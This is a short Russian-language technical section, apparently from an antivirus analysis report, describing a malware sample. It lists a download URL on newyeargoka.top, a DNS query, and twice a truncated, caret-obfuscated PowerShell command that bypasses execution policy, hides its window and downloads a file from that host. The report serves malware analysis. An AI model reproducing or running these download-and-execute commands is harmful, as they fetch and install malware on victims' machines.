Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^we^RSheLl.EXe -^e^x^ECU^tionp^o^L^icY ^by^Pas^s^ -nO^P^RO^F^iL^e^ -wI^Nd^o^ws^t^Y^Le ^HIdd^en (new-ob^JE^ct sy^s^t^e^M.^n^e^t^.^WE^bC^liEn^T).^Do^wNLO^ADfIle^('http://ne...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PO^we^RSheLl.EXe -^e^x^ECU^tionp^o^L^icY ^by^Pas^s^ -nO^P^RO^F^iL^e^ -wI^Nd^o^ws^t^Y^Le ^HIdd^en (new-ob^JE^ct sy^s^t^e^M.^n^e^t^.^WE^bC^liEn^T).^Do^wNLO^ADfIle^('http://ne...' (со скрытым окном)